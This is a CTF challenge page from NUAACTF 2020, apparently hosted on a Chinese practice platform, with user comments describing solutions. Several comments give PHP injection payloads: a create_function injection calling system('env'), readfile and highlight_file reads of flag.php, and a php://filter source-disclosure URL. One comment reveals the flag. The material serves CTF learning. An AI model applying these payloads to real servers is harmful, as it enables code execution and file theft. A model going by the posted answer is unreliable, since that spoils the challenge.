command-injectionWEB 未解决

分数: 0 金币: 0
所属赛事: NUAACTF 2020
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 202
提  示:
描  述:
nuaactf{}
评论
vincentshine 5月前

不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行

回复 0

xiaobai568 11月前

createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试

回复 0

coolsword2023 1年前

createfun.php?func=create_function&&arg=){}system("env");//

回复 0
xiaoxiao972521 1年前

这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php

回复 0

zhaiye 1年前

nuaactf{php_IS_thE_best_language}

回复 0

justsosoloveyou 1年前

html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php

回复 0

hopeinhand 1年前

注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php

回复 5

WriteUp

image
2901600657

3 金币

评分(0)

暂无评分

解题动态

2845985939 攻破了该题 2天前
sssmmmmmm 攻破了该题 8天前
zaidengyiyechunyu 攻破了该题 8天前
蟹堡王第一厨师长 攻破了该题 9天前
17857024334 攻破了该题 9天前
YYYCC 攻破了该题 21天前
Waitcat 攻破了该题 1月前
下雨天y 攻破了该题 1月前
梦游的小狐狸 攻破了该题 1月前
Cirsis 攻破了该题 1月前
snoway34 攻破了该题 1月前
czg9000 攻破了该题 1月前
ssoocc 攻破了该题 1月前
A1234467 攻破了该题 1月前
bugku111rao 攻破了该题 2月前
wangdashuai 攻破了该题 2月前
dir_tree 攻破了该题 2月前
flaglspursuer 攻破了该题 3月前
biandanjun 攻破了该题 3月前
TOMCAT336699 攻破了该题 3月前
问题反馈